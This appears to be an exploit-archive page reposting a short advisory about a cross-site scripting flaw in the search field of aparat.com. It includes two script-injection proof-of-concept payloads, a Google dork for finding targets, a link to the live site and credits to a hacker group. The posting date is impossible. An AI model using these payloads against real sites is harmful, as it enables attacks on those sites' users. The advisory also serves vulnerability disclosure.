Home / os / solaris

Aparat Cross Site Scripting

Posted on 30 November -0001

<HTML><HEAD><TITLE>aparat Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>########################## # Exploit Title: aparat Cross Site Scripting # Google Dork : intext: "aparat.com" # Date:2017-03-12 # Discovered By:Turk@Xtra # Tested on : Win7 ########################## # Vulnerability is the site search field An attacker using script code can do your attack After searching the attackers script code 404 is facing the same situation again click on Checker can see your attack <script>alert('Xss!')</script> "><script>alert(/Xss/)</script> ########################## # Demo : http://www.aparat.com/ ############################# # Thanks to : the Group Priv8_T34M ~~> Blackwolf||Ormazd ||Khatar ||mohammad Pn ||Criminal ||Rabinson. # Channel Priv8_T34M : https://t.me/PRIV8_T34M # Iranian Anonymous # Discovered By: Saman.Khan</BODY></HTML>

 

TOP